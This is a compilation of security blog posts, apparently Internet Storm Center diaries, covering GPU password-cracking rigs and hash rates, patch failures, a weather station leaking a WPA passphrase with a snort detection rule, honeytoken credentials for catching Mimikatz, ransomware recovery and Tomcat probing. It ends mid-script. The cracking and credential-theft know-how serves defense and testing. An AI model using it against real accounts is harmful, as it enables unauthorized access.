Some Indicators of Compromise, something we can use to identify whether our organizations or clients are affected, are included in the PDF. The DNS IoCs included are especially easy to use, either as checks against logs or as black-hole entries.
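Checking DNS logs against a list of IoC domains is a short script. The sketch below matches a queried name against a set of domains, including subdomains; the domain names are placeholders under `.example`, not entries from the Kaspersky document, and the function name is hypothetical.

```python
def matches_ioc(query_name: str, ioc_domains: set) -> bool:
    """True if the queried name is an IoC domain or a subdomain of one."""
    labels = query_name.lower().rstrip(".").split(".")
    # Test every suffix of the name: a.b.c, then b.c, then c.
    return any(".".join(labels[i:]) in ioc_domains for i in range(len(labels)))

# Placeholder IoC list; load the real entries from the published document.
ioc_domains = {"bad.example", "evil-updates.example"}

for name in ["c2.bad.example.", "www.isc.sans.edu", "notbad.example"]:
    print(name, matches_ioc(name, ioc_domains))
```

Matching on whole labels rather than plain substrings avoids false hits on names that merely end with the same characters.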

===============

Rob VandenBrink

Metafore


Throwing more Hardware at Password Cracking - Lessons Learned

A while back I put up an article on exposing a GPU to a virtual machine for cracking password hashes (https://isc.sans.edu/forums/diary/Building+Your+Own+GPU+Enabled+Private+Cloud/16505). This worked great for me for a while, but then it became evident that one or two GPUs just weren't enough - each GPU adds a linear amount of processing power, so 6 GPUs will solve problems 6 times faster than a single GPU. Problems like cracking wireless keys, Windows passwords, passwords on documents or databases, any number of things (150 different hash types in the latest version of hashcat).

What I found when I added more GPUs to my ESX host was that there's a limit on VT-d (DirectPath I/O in ESX) - you can only assign up to 8 devices in ESXi 5.x. Since each GPU represents 2 devices, that's only 4 GPUs. (http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=1010789)

So I had to go to a physical server to get past 4. What more is there to learn you ask? First of all, the Linux drivers just don't cut it. Getting more than a few GPUs to be recognized from one reboot to the next is a challenge, even if you use the exact OS Versions and drivers recommended. Even getting lspci to see them all was a gamble - each time I powered the server on was a roll of the dice.

Windows drivers work fairly well - however, in Windows 7 there's a hard limit of 4 AMD GPUs (mine are AMD R9 280x's) buried in the driver - don't forget that these are supposed to be graphics adapters, and limiting a system to 4 PCIE x16 graphics cards actually makes decent sense. However, we're not using these for graphics! You can fix this limit with some judicious registry edits, but these vary quite a bit depending on the GPU model and OS. The fine folks at lbr.id.lv put together an executable (6xGPU_Mod) that builds the reg changes for your setup - find it here:

https://lbr.id.lv/6xgpu_mod/6xGPU_mod.html

But wait, there's more! OCLHashcat requires a specific version of the AMD drivers to work correctly. Again, these are graphics cards, and the newer versions of the driver don't lend themselves to computation apparently (a bug that doesn't affect graphics affects mathematical calculation). Today's recommendation (for oclhashcat) is to use AMD driver version 14.9 (exactly), and no other. This version recommendation does change - refer back to the documentation for whatever tools you are using for driver version recommendations.

Also, don't skimp on power supplies. I have 2500W available (2x1250) for these 6 GPUs and the powered risers that feed them, plus the power supply for the system unit. If the cards don't have enough power, either they'll just run slower, or they won't run - either way it's an easy fix. And if you have issues during the build (everyone does on these), ruling out power problems is a good start in resolving these problems. I budget 300W per card - likely at least a bit overkill, but I'd rather have a bit extra than be a bit short. The old proverb "when in doubt, max it out" is a good one for a reason.
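The power budget above is simple arithmetic, sketched here with the figures from this build (6 cards, 300W budgeted per card, 2x1250W supplies). The function name is purely illustrative, and the draw of the powered risers is not modelled, so treat the headroom as an upper bound.

```python
def gpu_power_headroom(num_gpus, watts_per_gpu, supply_watts):
    """Return (budgeted_watts, headroom_watts) for a GPU rig.

    supply_watts is a list of the supplies feeding the GPUs.
    Riser draw is NOT included here (an assumption of this sketch).
    """
    budgeted = num_gpus * watts_per_gpu
    available = sum(supply_watts)
    return budgeted, available - budgeted


# Figures from the build described above.
budgeted, headroom = gpu_power_headroom(6, 300, [1250, 1250])
print(f"Budgeted for GPUs: {budgeted} W, headroom: {headroom} W")
```

A negative headroom would be the first thing to rule out when cards run slow or drop off the bus.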

At long last though, I now have 6 GPUs dedicated to cracking whatever encrypted information I need to throw them at!

One final note - yes, I do know that you can spin up an AWS instance with GPUs to perform similar functions. In my practice though, I'm not comfortable cracking customer passwords on someone else's server. Also, in my previous rig, it was not uncommon to see password cracking runs for a typical list of hashes take 5-7 days, with 2 GPUs running flat-out - depending on the list and the hashing algorithm, this can run up to some serious computation time, which costs real dollars in a cloud service. Bumping the count up to 6 GPUs in my own build cuts the time for me down by a factor of 3 for a pretty low cost, and still keeps the password hashes (and cracked passwords) in my own rack of servers.
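As a rough check on that factor of 3, here is a minimal sketch that assumes run time scales inversely with GPU count (the linear scaling described at the top of this post). The function name is hypothetical, and real runs will see some overhead.

```python
def scaled_runtime_days(days, old_gpus, new_gpus):
    """Estimate run time after changing GPU count, assuming linear scaling."""
    return days * old_gpus / new_gpus


# The 5-7 day runs on 2 GPUs, re-estimated for 6 GPUs.
for days in (5, 7):
    print(f"{days} days on 2 GPUs is roughly "
          f"{scaled_runtime_days(days, 2, 6):.1f} days on 6 GPUs")
```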

If you've found other gotchas in this sort of implementation, or if you've had good luck using a cloud service for stuff like this, please use our comment form and let us know how you've fared!

===============

Rob VandenBrink

Metafore


oclHashcat 1.33 Released

In the author's own words, oclHashcat 1.33 is "what 1.32 should have been". I think they're too hard on themselves - 1.32 was pretty darned good too. There are a number of good changes in 1.33 though - of interest to most of us is support for PDF passwords and PBKDF2 (2 variants of that so far). Look for more PBKDF2 variants in days to come - version 1.33 sees a PBKDF2 kernel added. There's also a new feature that will affect the bottom line of many folks who use oclHashcat - wordlist processing is now multithreaded, so expect to see dictionary attacks run quicker.

So if your client took your advice and moved their MD5 hashed password database to PBKDF2, with a few more GPUs you can make a point on that new method as well. Though I'm not sure what you'd recommend to replace PBKDF2 ...

In my rig (6 GPUs), I'm seeing 3 million hashes per second on PBKDF2, and 30,000 hashes per second on PDF 1.7 level 8 (Acrobat 10 or 11). So PBKDF2 is still way more computationally expensive than MD5 (now tracking around 54 billion hashes per second), but if you use intelligent, targeted password lists - maybe using CeWL for a base list and perhaps some numeric / season mods folded into those words - you can still make a serious dent in a list of poorly chosen passwords (in other words, almost any hashed password list).
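To put those rates in perspective, here is a small sketch that estimates how long one pass over a candidate list takes at each rate quoted above. The one-billion-candidate list size is a made-up illustration, and the sketch assumes a single target hash (salted lists multiply the work).

```python
# Hash rates quoted above for the 6-GPU rig, in hashes per second.
RATES = {
    "MD5": 54e9,
    "PBKDF2": 3e6,
    "PDF 1.7 level 8": 30e3,
}


def seconds_to_exhaust(candidates, rate):
    """Time to try every candidate once against a single hash."""
    return candidates / rate


candidates = 1e9  # hypothetical wordlist-plus-rules size
for name, rate in RATES.items():
    print(f"{name}: {seconds_to_exhaust(candidates, rate):,.2f} s")

# How much slower PBKDF2 is than MD5 on this rig.
print(f"MD5 / PBKDF2 rate ratio: {RATES['MD5'] / RATES['PBKDF2']:,.0f}x")
```

The gap between the rates is why a small, targeted list matters far more against PBKDF2 than against MD5.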

Happy password cracking!

===============

Rob VandenBrink

Metafore


Microsoft Patch Mayhem: February Patch Failure Summary

February was another rough month for anybody having to apply Microsoft patches. We had a couple of posts already covering the Microsoft patch issues, but due to the number of problems, here is a quick overview of what has failed so far:

| Bulletin/KB # | Patch | Symptom | Solution |
|---|---|---|---|
| MS15-009 KB 3023607 | SSL fix to address the "POODLE" vulnerability. | Cisco AnyConnect will refuse to connect | Run AnyConnect client in Windows 7 or Windows 8 Compatibility Mode |
| KB2920732 | PowerPoint (functionality fix, not a security patch) | PowerPoint 2013 fails to start on Windows RT | "Refresh" your device (see https://support.microsoft.com/kb/2751424 ) or remove patch. Microsoft did withdraw the patch. |
| MS15-010 KB3013455 | Windows Kernel Mode Drivers | Font quality degrades in Windows Vista SP2 and Windows Server 2003 SP2 (also affected: Windows XP if you paid for extended support). | Remove patch |
| KB3001652 | Update for Microsoft Visual Studio 2010 Tools for Office Runtime | Patch will not finish installing and "hang" making the system unresponsive | This patch has to be installed as Administrator. Otherwise, the user will not see a dialog box that needs to be acknowledged to complete the install. Microsoft withdrew the patch and later reissued it. No problems with the re-issued version. There are 3 "versions" of this patch: October 2014: initial release |

Also, an important reminder: the "Group Policy" patch alone does not fix the actual vulnerability. In addition to applying the patch, you have to enable the new group policy options.

See https://support.microsoft.com/kb/3000483 for details.


Microsoft February Patch Failures Continue: KB3023607 vs. Cisco AnyConnect Client

Another patch released by Microsoft this month is causing problems. This time it is KB3023607, which was supposed to mitigate the POODLE vulnerability. Once applied, Cisco AnyConnect users are no longer able to connect to their VPN.

For more details, also see the Cisco bug report https://tools.cisco.com/bugsearch/bug/CSCus89729 (requires login).

The issue appears to affect Windows 8.1, in which case running the application (vpnui.exe) in Windows 8 compatibility mode will fix the problem for now.


Did You Remove That Debug Code? Netatmo Weather Station Sending WPA Passphrase in the Clear

(BTW: it looks like the firmware update released this week by netatmo after reporting this issue fixes the problem. Still trying to completely verify that this is the case)

I have the bad habit of playing with home automation and various data acquisition tools. I could quit any time if I wanted to, but so far, I decided not to. My latest toy to add to the collection was a "Netatmo" weather station. It fits in nicely with the aluminum design of my MacBook, so who cares if the manufacturer considered security in its design, as long as it looks cool and is easy to set up.

Setting up the device was pretty straightforward, and looked "secure". It requires connecting to the device via USB, and a custom application is used to configure the device with your username, password and WiFi settings including the WiFi password. After the initial setup, the station needs USB for power only, and communicates via WiFi to the "Cloud".

But after the simple setup, a nice "surprise" waited for me in my snort logs:

[**] [1:1000284:0] WPA PSK Passphrase Leak [**] [Priority: 0] {TCP} a.b.c.d:21908 -> 195.154.176.41:25050

I do have a custom rule in my snort rule set, alerting me of the passphrase being sent in the clear. Let's just say that it has happened before. The rule is very simple:

alert ip any any -> any any ( sid: 1000284; msg: "WPA PSK Passphrase Leak"; content: "[Iamnotgoingtotellyou]"; )
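The same idea can be sketched outside of snort: search each captured payload for the secret as a plain byte string. The payloads and the passphrase below are placeholders, and the function name is only for illustration; this is not how snort implements content matching.

```python
def find_secret_leaks(payloads, secret):
    """Return (payload_index, byte_offset) for each payload containing secret.

    Only the first occurrence in each payload is reported.
    """
    hits = []
    for index, payload in enumerate(payloads):
        offset = payload.find(secret)
        if offset != -1:
            hits.append((index, offset))
    return hits


# Hypothetical payloads; the passphrase is the same placeholder as in the rule.
secret = b"Iamnotgoingtotellyou"
payloads = [
    b"GET /weather HTTP/1.1\r\n\r\n",
    b"ssid=HomeNet;psk=Iamnotgoingtotellyou;mac=00:11:22:33:44:55",
]
print(find_secret_leaks(payloads, secret))
```

Like the rule, this only catches the passphrase when it is sent verbatim; an encoded or encrypted copy would not match.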

So what happened? After looking at the full capture of the data, I found that indeed the weather station sent my password to "the cloud", along with some other data. The data include the weather station's MAC address, the SSID of the WiFi network, and some hex encoded snippets.

Not only should data like this not be transmitted "in the clear", but in addition, there is no need for Netatmo to know the WPA password for my network.

I reported the problem to Netatmo, and got the following reply:

Hi,Indeed at first startup we dump weather station memory for debug purposes, we will not dump it anymore.We will remove this debug memory very soon (coming weeks).

So far I haven't seen any additional transmissions from the weather station containing the password, even after restarting it. I didn't do a full factory reset yet. But in general, the data appears to be unencrypted. The MAC addresses of the station and the outdoor sensor are easily found in the payload. So far, I couldn't find any documentation for the protocol, so it will take a bit more time to reverse it.

According to the weather station map provided by Netatmo, these devices are already quite popular. Here is a snapshot of the map in my "Neighborhood":


Did PCI Just Kill E-Commerce By Saying SSL is Not Sufficient For Payment Info ? (spoiler: TLS!=SSL)

The "Council's Assessor Newsletter", which is distributed by the Payment Card Industry council responsible for the PCI security standard, contained an interesting paragraph that is causing concerns among businesses that have to comply with PCI for online transactions. [1]

The paragraph affects version 3.1 of the standard. Currently, version 3.0 of the standard is in effect, and typically these point releases clarify and update the standard, but don't include completely new requirements. In short, the newsletter states that

no version of SSL meets PCI SSC's definition of "strong cryptography"

Wow. Is this the end of e-commerce as we know it? I thought SSL is (was?) THE standard to protect data on the wire. Yes, it had issues, but a well configured SSL capable web server should be able to protect data as valuable as a credit card number adequately. So what does it mean?

Not quite. You can (and should!) do https without SSL. Remember TLS? That's right: SSL is out. TLS is in. Many developers and system administrators use "SSL" and "TLS" interchangeably. SSL is not TLS. TLS is an updated version of SSL, and you should not use ANY version of SSL (SSLv3 being killed by POODLE). So what you should do is make sure you are using TLS, and this "new" rule won't affect you at all.
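As an illustration of "TLS only" on the client side, here is a minimal sketch using Python's standard ssl module. Pinning the floor at TLS 1.2 is an assumption of this sketch, not something the newsletter specifies, and the function name is hypothetical.

```python
import ssl


def make_tls_only_context(minimum=ssl.TLSVersion.TLSv1_2):
    """Build a client context that will not negotiate anything below `minimum`.

    Every SSL version sits below any TLS version, so SSLv3 is refused.
    """
    # create_default_context() keeps certificate and hostname checks enabled.
    context = ssl.create_default_context()
    context.minimum_version = minimum
    return context


context = make_tls_only_context()
print(context.minimum_version.name)
```

Server software has its own equivalent setting; the point is to configure the protocol floor explicitly rather than rely on defaults.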

Secondly, you could try to take advantage of new JavaScript APIs to encrypt the data on the client before it is ever sent to the server. This is a neat option that is not yet available in all browsers, but something to consider, in particular if you pass payment information to backend systems. In this case, you pass a public key as a JavaScript variable, and then use JavaScript on the client to encrypt the card number. Only backend systems that need to know the raw payment data will have the private key to decrypt this information.

Next: Also make sure your system administrators, and hopefully your QSAs, understand that SSL != TLS and assess you correctly.

[1] https://www.darasecurity.com/article.php?id=31


Microsoft Hardens GPO by Fixing Two Serious Vulnerabilities.

Microsoft released more details about two vulnerabilities patched on Tuesday. Both patches harden Microsoft's group policy implementation. [1]

Group policy is a critical tool to manage larger networks. Not just enterprises, but also a lot of small and medium size businesses depend on group policies to implement and enforce baseline configurations. With the ability to manage systems remotely comes the risk of someone else impersonating and altering these group policies.

Windows can be configured to retrieve a remote login script whenever the user logs in. The system attempts to run this script at every login, even if the system is connected to a "foreign" network (e.g. Coffee Shop, SANS Conference Hotel Network ...). An attacker could observe these requests, and set up a server to respond to them and deliver a malicious file. The victim will (happily?) execute the file.

You would think that this should fail, as the attacker's server can not be authenticated. However, it turns out that if the client can't find a server that supports authentication, it will fall back to one that does not support any authentication mechanisms. After the patch is applied, the client will require that the server supports methods for the client to verify the server's authenticity.

The second bug patched affected systems that were not able to receive a policy, or systems that received a corrupt policy. In this case, the system would revert to a default configuration, which may not include some of the protections the actual configuration provided.

MS15-011 is a "must apply" patch for any system traveling and connecting to untrusted networks. For internal systems, this is less of a problem, but should not be ignored either as it may be used for lateral movement inside a network. But even then, the attack is more difficult as it competes with the legitimate server.

For more details, please refer to the Microsoft blog.

[1] http://blogs.technet.com/b/srd/archive/2015/02/10/ms15-011-amp-ms15-014-hardening-group-policy.aspx


Microsoft Patches appear to be causing problems

Just a heads up to our readers. We have received multiple reports of Microsoft patches causing machines to hang. There is also a report that Microsoft has pulled one of the patches. Specifically, we have had issues reported with the Visual Studio Patch. We will continue to monitor the situation and keep you posted. If you have any more information on this please leave us a comment.

Thank you

Mark Baggett


Microsoft Update Advisory for February 2015

Overview of the February 2015 Microsoft patches and their status.

| # | Bulletin | Affected | Contra Indications - KB | Known Exploits | Microsoft rating(**) | ISC rating(*): clients | ISC rating(*): servers |
|---|---|---|---|---|---|---|---|
| MS15-009 | Security Update for Internet Explorer (Replaces MS14-080) | Microsoft Windows, Internet Explorer (39 CVEs. Too many to list here) | KB 3034682 | . | Severity: Critical, Exploitability: 0 | Critical | Critical |
| MS15-010 | Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (Replaces MS13-006 MS14-066 MS14-074 MS14-079) | Microsoft Windows CVE-2015-0003 CVE-2015-0010 CVE-2015-0057 CVE-2015-0058 CVE-2015-0059 CVE-2015-0060 | KB 3036220 | vuln. public. | Severity: Critical, Exploitability: 2 | Critical | Critical |
| MS15-011 | Vulnerability in Group Policy Could Allow Remote Code Execution (Replaces MS13-031 MS13-048 MS15-001) | Microsoft Windows CVE-2015-0008 | KB 3000483 | . | Severity: Critical, Exploitability: 1 | Critical | Critical |
| MS15-012 | Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (Replaces MS13-085 MS14-023 MS14-081 MS14-083) | Microsoft Office CVE-2015-0063 CVE-2015-0064 CVE-2015-0065 | KB 3032328 | . | Severity: Important, Exploitability: 1 | Critical | Important |
| MS15-013 | Vulnerability in Microsoft Office Could Allow Security Feature Bypass | Microsoft Office CVE-2014-6362 | KB 3033857 | vuln. public. | Severity: Important, Exploitability: 1 | Important | Important |
| MS15-014 | Vulnerability in Group Policy Could Allow Security Feature Bypass | Microsoft Windows CVE-2015-0009 | KB 3004361 | . | Severity: Important, Exploitability: 2 | Important | Important |
| MS15-015 | Vulnerability in Microsoft Windows Could Allow Elevation of Privilege (Replaces MS15-001) | Microsoft Windows CVE-2015-0062 | KB 3031432 | . | Severity: Important, Exploitability: 2 | Important | Important |
| MS15-016 | Vulnerability in Microsoft Graphics Component Could Allow Information Disclosure (Replaces MS14-085) | Microsoft Windows CVE-2015-0061 | KB 3029944 | . | Severity: Important, Exploitability: 2 | Important | Important |
| MS15-017 | Vulnerability in Virtual Machine Manager Could Allow Elevation of Privilege | Microsoft Server Software CVE-2015-0012 | KB 3035898 | . | Severity: Important, Exploitability: | Important | Important |

We appreciate updates

US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY

- We use 4 levels:

- PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.

- Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.

- Important: Things where more testing and other measures can help.

- Less Urgent: [...] practices for servers such as not using Outlook, MSIE, Word etc. to do traditional office or leisure work.

Mark Baggett Follow me on Twitter:@markbaggett

Join me in Orlando, Florida on April 13th. Attackers and Defenders will learn the essentials of Python, networking, regular expressions, interacting with websites, threading and much more. Sign up soon for discounted pricing.


Detecting Mimikatz Use On Your Network

I am an awesome hacker. Perhaps the world's greatest hacker. Don't believe me? Check out this video where I prove I know the administrator password for some really important sites!

(Watching it full screen is a little easier on the eyes.)

http://www.youtube.com/watch?v=v2IVRcktKZs

OK. I lied. I'm a fraud and I'll concede the title of greatest hacker to those listed at attrition.org's charlatans page. I didn't really hack those sites. But I certainly did enter a username and password for those domains and my machine accepted it and launched a process with those credentials! Is that just a cool party trick or perhaps something more useful? What happened to those passwords I entered?



The /netonly option for the runas command is used to launch a program as a user that exists on a remote machine. The system will accept the username and password for that remote user and create an authentication token in the memory of your LSASS process without any interaction with the remote host. With this option I can run commands on my host as the administrator of the microsoft.com domain without having to actually know the password for that account. Sounds dangerous? Well, it is not really. The command that you run doesn't have any elevated access on your machine, and with an invalid password it is not a threat to Microsoft. Windows doesn't try to authenticate to the microsoft.com domain to launch the process. It assumes that the credentials are correct, calculates the hashes and stores them in memory for future use. At some point in the future, if you try to access a resource on that domain, it will automatically use Windows single sign-on capabilities to "PASS THE HASH" to the remote system and log you in. But until you try to access the remote network, the passwords just sit there in memory.

The result is a really cool party trick and an even cooler way we can detect stolen password hashes being used in our environment. You see, those fake credentials are stored in the exact same location as the real credentials. So, when an attacker uses mimikatz, Windows Credential Editor, meterpreter, procdump.exe or some other tool to steal those passwords from your system, they will find your staged "Honey Hash Tokens" in memory. It is worth noting that they will not see those hashes if they use "run hashdump", "hashdump" or any of the other commands that steal password hashes from disk rather than memory. However, finding no domain hashes on disk is not uncommon unless the attacker is on the Domain Controller, so it will not raise suspicion.

Let's try it out and see how this deception might look to an attacker. First, I ran the following command to create a fake microsoft.com administrator record:

Then, when prompted for the microsoft.com administrator I can provide any password that I want. In this example I typed "superpass". Now, let's create an account for root on the domain linux.org. Yes, I know that is absurd. The absurdity demonstrates that you can put anything in LSASS you want. You can even use this to post snarky messages taunting the attackers if you want to live dangerously. (Not Recommended) Here is what you type to create those credentials.

Once again, when prompted for the root user's password, I can enter anything I want. For this example I chose "notreallythepassword". You will need to leave those command prompts running on your system to keep the credentials in memory. That is something a careful attacker might notice, but I'm betting they won't. Next, I ran mimikatz to see what an attacker would see and this is what I found:

You can see both the hashes and clear text passwords sitting there just waiting for a hacker to find them. But these hashes, unlike all the others, will not get them anywhere on my network. This powerful deception can be exactly what you need to detect the use of stolen passwords on your network.

Here is the idea. You stage these fake credentials in the memory of computers you suspect might be the initial entry point on your network. Perhaps all the computers sitting in your DMZ. For a great deception, my friend Rob Fuller (@mubix) is toying with the idea of putting this into the logon scripts to stage fake workstation administrator accounts on all the machines in your network. Then you would set up alerts on your network that detect the use of the fake accounts. Be sure to choose a username that an attacker will think is valid and will have high privileges on your domain. So rather than microsoft.com\administrator you might try

That's the idea. I hope it is helpful.
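The alerting side can be sketched as a simple filter over authentication events: any event that names a staged account is worth a look. The event fields (time, source, account) and the sample records below are hypothetical; map them onto whatever your log source actually provides.

```python
def find_honeytoken_use(events, honey_accounts):
    """Return the events whose account matches a staged honeytoken account.

    Account names are compared case-insensitively.
    """
    honey = {name.lower() for name in honey_accounts}
    return [event for event in events if event["account"].lower() in honey]


# The two fake accounts staged in this post.
HONEY_ACCOUNTS = ["microsoft.com\\administrator", "linux.org\\root"]

# Hypothetical, already-parsed logon events.
events = [
    {"time": "2015-02-10T09:14:00", "source": "10.0.0.5",
     "account": "corp\\alice"},
    {"time": "2015-02-10T09:15:30", "source": "10.0.0.66",
     "account": "MICROSOFT.COM\\Administrator"},
]

for hit in find_honeytoken_use(events, HONEY_ACCOUNTS):
    print(f"ALERT: honeytoken {hit['account']} used from {hit['source']} at {hit['time']}")
```

Since nobody legitimate should ever use these accounts, a single match is a high-confidence signal.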

UPDATE: The name "honeytokens" was originally coined by Augusto Barros https://twitter.com/apbarros way back in 2003. Although I called them "honey hashes" there have been some other cool names suggested. I like Rob VandenBrink's name of "Credential Canaries". Other suggested names include "password phonies", "lockout logins" or "Surreptitious SATs" but in the end they are just another type of honeytoken.

Mark Baggett Follow me on Twitter:@markbaggett

Like this? Interested in learning how to automate this and other common tasks with Python? Join me in Orlando, Florida on April 13th. Attackers and Defenders will learn the essentials of Python, networking, regular expressions, interacting with websites, threading and much more. Sign up soon for discounted pricing.


Backups are part of the overall business continuity and disaster recovery plan

The mantra of "A working, tried and tested backup is something that has to be done" almost seems to be catching on after over twenty years of saying it. The horror stories in the media of people and companies losing data may have helped reinforce the message and need. As long as backups are happening, then we’re one step closer to a reasonable and working recovery process. There are those businesses (and people) that have implemented a backup process, but haven’t thought past backing up the data.

Let me offer an example. I got one of those phone calls from a friend, saying a friend of theirs was having “some really bad internet virus trouble” and could I help out. Those amongst you that get these types of calls can immediately spot that my friend had no real idea of what the problem was. A call to the poor soul with “some really bad internet virus trouble” revealed a reasonably frustrated, but still rational person. She was quickly able to clearly describe what was happening to some of the Windows systems there and it took seconds to work out they had been hit by a CryptoWall [1] type malware. Australian email addresses have been plagued with emails using well known Australian companies as lures to trick the unsuspecting user into running the encrypting malware. And that’s what had happened here.

My questions were: “Do you have backups of the now encrypted files?” and the answer came back they did. “Do you know how to restore from those backups and can you do that to a safe machine?”, again they did and found a machine to restore the data to.

A bit of time passed as the files were restored and checked. The happy outcome was all the files and data were there and they’d only lost about a day’s worth of work. I could hear her relief once the files were recovered, but being a cheery security professional I asked one final question. “Do you have copies of the software on those three encrypted machines, as you need to format them and start again – just to be safe”. That produced the “Oh. Er. Um, let me find out”. One of the machines encrypted was their accountant’s system, which was running software that would have looked old and out of date in Hackers [2]. After a bit more advice I left them to it, as there wasn’t anything further I could do.

The outcome resulted in the owner buying three new computers, all preloaded with new versions of the required software. The ancient accounts software data was able to be imported to a new, supported accounts software and the business lost roughly a day’s worth of work*. This is a pretty impressive turnaround for a small company with no internal IT support.

It does, however, point out that backups are only part of a business continuity and disaster recovery plan. As security and IT folks, we can advise and recommend that people and their businesses understand the entirety of business continuity and disaster recovery planning. We’ve discussed it a number of times in Diaries at the Internet Storm Center [3]. For the owner I was talking with, I pointed her to a local resource [4] here in Australia, but for those in the United States this is a great resource [5] as a starting point. Find out if plans are in place, and if not, then start these conversations now, rather than during or after an incident.

If you have any other suggestions or advice on getting business continuity and disaster recovery planning in place and updated, please feel free to add a comment.

Chris Mohan --- Internet Storm Center Handler on Duty

[1] Cryptowall 3.0 Sample http://malware-traffic-analysis.net/2015/02/06/index2.html

[2] http://en.wikipedia.org/wiki/Hackers_%28film%29

[3] https://isc.sans.edu/diary/Cyber+Security+Awareness+Month+-+Day+31+-+Business+Continuity+and+Disaster+Recovery/14425

[4] https://www.business.qld.gov.au/business/running/risk-management/business-continuity-planning

[5] http://www.ready.gov/business

* The accountant had to learn some new software which took time and effort not accounted for in the total downtime, as it wasn’t impacting the rest of the business.


BURP 1.6.10 Released

The fine folks at Portswigger released the latest version of BURP last week - v1.6.10

New checks include:

- Server-side include (SSI) injection

- Server-side Python code injection

- Leaked RSA private keys

- Duplicate cookies set

Also, new APIs have been added to Burp Extender, and there are changes to accommodate SSL handling in newer versions of Java (SNI handling in the handshake).

Full details at: http://releases.portswigger.net/

===============

Rob VandenBrink

Metafore


Raising the "Creep Factor" in License Agreements

When I started in this biz back in the 80's, I was brought up short when I read my first EULA (End User License Agreement). Back then, software was basically wrapped in the EULA (yes, like a Christmas present), and nobody read them then either. Imagine my surprise at the time that I hadn't actually purchased the software, but was granted the license to use the software, and ownership remained with the vendor (Microsoft, Lotus, UCSD and so on).

Well, things haven't changed much since then, and the concept of ownership has been steadily creeping further and further into information "territory" that we don't expect. Google, Facebook and pretty much any other free service out there sells any information you post, as well as any other metadata that they can scrape from photos, session information and so on. The common proverb in those situations is "if the service is free, then YOU are the product". Try reading the Google, Facebook or Twitter terms of service if you have an hour to spare and think your blood pressure is a bit low that day.

The frontier of EULAs, and the market where you seem to be giving up the most private information you don't expect, however, seems to be in home appliances - in this case Smart Televisions. Samsung recently posted their EULA for their SmartTV here:

https://www.samsung.com/uk/info/privacy-SmartTV.html

They're collecting the shows you watch, internet sites visited, IP addresses you browse from, cookies, "likes", search terms (really?) and all kinds of other easy to collect and apparently easy to apologize for (in advance) information. With this information, so far I'm pretty sure I'm not hooking up my TV to my home wireless or ethernet, but I'm not surprised - pretty much every Smart TV vendor collects this same info.

But the really interesting passage, where the "creep factor" is really off the charts for me is:

"Please be aware that if your spoken words include personal or other sensitive information, that information will be among the data captured and transmitted to a third party through your use of Voice Recognition."

No word of course on who the "third parties" are, and what their privacy policies might be.

Really and truly a spy in your living room. I guess it's legal if it's in a EULA or you work for a TLA? And it's morally OK as long as you "apologize in advance?"

=====================================

https://www.facebook.com/legal/terms

https://www.facebook.com/about/privacy/

http://www.google.com/intl/en/policies/terms/

http://www.google.com/intl/en/policies/privacy/

===============

Rob VandenBrink

Metafore


Update to kippo-log2db.pl

I discovered an issue with the tool I wrote about last June. I've updated kippo-log2db.pl, correcting an error where it was populating the sensor column of the session table improperly. I discovered the error after loading some data into MySQL and then attempting to use Ion's kippo2elasticsearch script to move the data into ElasticSearch. I've also discovered an anomaly that I have not yet taken up with the kippo author: why is the sensor column in the session table int(4) when the id column of the sensor table is int(11)? Since I only have a handful of sensors, it hasn't impacted me, but if you have an installation with a huge number of sensors, this could become a problem. Anyway, get the new version and if you've imported data using the old version, you may need to reimport. Sorry about that.

References:

http://handlers.sans.org/jclausing/kippo-log2db.pl

---------------

Jim Clausing, GIAC GSE #26

jclausing --at-- isc [dot] sans (dot) edu


Anthem, TurboTax and How Things "Fit Together" Sometimes

Everybody has probably heard of the Anthem data breach. If you are affected, you probably got an e-mail from your HR person with some details by now, or you got a phishing e-mail making sure you can enjoy the "Breached" feeling even without having a health plan with Anthem.

Whenever there is a big event, be aware that others may jump on the coat tails of the news coverage to take advantage of the general confusion. Hardly any "Anthem" customers had actually heard the name before, as they typically use a local health plan that is part of the larger Anthem network.

If you receive any phishing emails (I only got one so far, but I bet there are more out there), then please forward them.

On the same note: What is someone going to do with your social security number? The standard answer is "identity theft" and "taking out a loan in your name". Either method is actually quite laborious, and people committing fraud don't do it because they like to work hard for their money. Turns out there is an easier way, and that gets us to the second story today:

TurboTax (Intuit) today announced that they will not process state returns due to excessive fraud. Tax season of course is just heating up in the US, and TurboTax decided to stop processing state returns after at least one state refused to accept them due to a high rate of fraud for returns filed with TurboTax.

Apparently, for your convenience, TurboTax saved the information you submitted in prior years. As anyone who has ever filled out a tax return knows, this information can be difficult to dig up. To retrieve this information, you need your global universal password: your Social Security Number. The result is that by using TurboTax, and knowing a tax filer's Social Security Number, fraudsters can very easily assemble a plausible tax return and pocket the refund. This fraud often goes undetected until the actual taxpayer submits a return. In this case, the later return is rejected and now the legitimate taxpayer has to prove that their return is more legitimate than the earlier one. This can lead to extensive delays in receiving a refund.


Tomcat security: Why run an exploit if you can just log in?

In our honeypots, we recently saw a spike of requests for http://[ip address]:8080/manager/html. These requests appear to target the Apache Tomcat server. In case you haven't heard of Tomcat before (unlikely): It is a "Java Servlet and JavaServer Pages" technology [1], essentially an easy way to create web applications using Java servlets. While Java may be on its way out on the client (wishful thinking...), it is still well liked and widely used in web applications. The vulnerabilities being attacked by the requests above are unlikely to be the same buffer-overflow type vulnerabilities we worry about on the client. Instead, you will likely see standard web application exploits, and in particular attacks against weak Tomcat configurations.
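If you want to check your own web server logs for the same kind of probing, a rough sketch along these lines may help. It assumes the log uses the Common Log Format; the function name and the sample addresses are made up for illustration, and your log layout may well differ.

```python
import re
from collections import Counter

# Assumption: log lines follow the Common Log Format, for example:
# 203.0.113.5 - - [05/Feb/2015:10:00:00 +0000] "GET /manager/html HTTP/1.1" 401 2550
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>\S+) (?P<path>\S+)'
)


def count_manager_probes(lines):
    """Count requests for the Tomcat manager app per source IP."""
    hits = Counter()
    for line in lines:
        match = LOG_LINE.match(line)
        if match and match.group("path").startswith("/manager/html"):
            hits[match.group("ip")] += 1
    return hits

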